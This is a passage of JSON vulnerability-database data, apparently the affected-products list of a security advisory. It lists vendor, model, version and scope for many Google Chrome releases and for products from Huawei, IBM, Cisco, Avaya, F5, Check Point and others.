"mcafee", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.868.0" }, { "model": "agile controller v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.536.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1304.1" }, { "model": "webex pcnow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.19" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.4" }, { "model": "oceanstor s6800t v100r005c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "qlogic 20-port 8gb san switch module for ibm bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.10.1.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.45" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "oceanstor cse v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1671.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.15" }, { "model": "power hmc r8.1.0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1017.0" }, { "model": "web element manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.10.2" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.427.0" }, { "model": "e9000 blade server ch242 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v3" }, { "model": "ipso r70.1", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.5" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1024" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.16" }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.43" }, { "model": "oceanstor s5500t v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.276.0" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.117" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "espace u2980 v100r001c10spc102", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.933.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.642.0" }, { "model": "netauthenticate", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.574.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.936.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.38" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.27" }, { "model": "3722-s51", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "workcentre r14-10 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7775061.090.224.30300" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.64" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.317.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.320.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.946.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.65" }, { "model": "ads virtual app", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.48" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.888.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.18" }, { "model": "access registrar appliance cisco prime access registrar applianc", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1307.0" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.224.0" }, { "model": "rack server rh5885 v100r001c0", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1678.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.97" }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.704.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.149" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.60" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1035" }, { "model": "policy assessment and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.288.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "ipso r76", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1291.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.68" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.2" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "20500" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.43" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "oceanstor 18800f v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.59" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.3" }, { "model": "espace uc v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.41" }, { "model": "espace uc v200r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.632.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.158" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.154" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.328" }, { "model": "operation agent virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.9" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.889.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.2" }, { "model": "aura application server sip core pb26", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "vae v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.899.0" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.2" }, { "model": "websphere process server hypervisor edition for novell suse", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1029" }, { "model": "gaia r71.40", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.571.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.57" }, { "model": "messaging application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1677.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.911.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.82" }, { "model": "esight network v200r003c10spc206", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.734.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.954.1" }, { "model": "cloudsystem enterprise software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.4" }, { "model": "gaia embedded r75.46", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "gaia r70.50", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "aura communication manager sp4", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.667.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1310.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.34" }, { "model": "t505 flexible thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.342" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.93" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.485.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.678.0" }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.00" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.16" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "virtual compute appliance software", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "puredata system for analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.372.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.91" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.949.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.638.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.450.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.392.0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.212" }, { "model": null, "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2053-4340" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.302.1" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1063" }, { "model": "gaia embedded r75.30", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.710.0" }, { "model": "sig9800 sig9800-x16 v300r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.206" }, { "model": "fusioncompute v100r003c10cp6001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.289.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.11" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1.4.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1685.0" }, { "model": "vpn gateway", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3070" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.735.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.568.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.487.0" }, { "model": "ipso r70.50", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.302.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.129" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.124" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.9" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.590.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.113" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.827.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.23" }, { "model": "rack server rh5885 v100r003c0", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v3" }, { "model": "gaia r71.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "system storage san04b-r 2005-r04", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.332.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.107" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.953.0" }, { "model": "oceanstor s2600t v100r005c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.666.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1071.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1013.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "collaboration pod on vmware vcenter server appliance", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.41" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0.23988" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.275.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.340.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57450" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.373.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.2" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.50" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.353.0" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.2" }, { "model": "gaia r75.30", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7228" }, { "model": "oceanstor s6900 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.26" }, { "model": "policy assessment and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.47" }, { "model": "secureplatform r75.30", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.470.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", 